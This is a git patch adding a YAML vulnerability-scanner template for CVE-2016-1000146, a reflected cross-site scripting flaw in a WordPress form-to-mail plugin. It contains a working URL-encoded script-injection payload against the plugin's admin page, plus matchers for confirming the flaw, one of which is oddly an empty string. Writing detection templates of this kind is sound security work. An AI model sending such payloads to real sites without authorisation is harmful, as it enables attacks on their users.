From 911570d0b37063c7fdb1a2fada942aa5756548fb Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 9 Aug 2021 06:17:34 +0700 Subject: [PATCH] Create CVE-2016-1000146.yaml --- cves/2016/CVE-2016-1000146.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2016/CVE-2016-1000146.yaml diff --git a/cves/2016/CVE-2016-1000146.yaml b/cves/2016/CVE-2016-1000146.yaml new file mode 100644 index 0000000000..aa06e3a5bf --- /dev/null +++ b/cves/2016/CVE-2016-1000146.yaml @@ -0,0 +1,29 @@ +id: CVE-2016-1000146 + +info: + name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200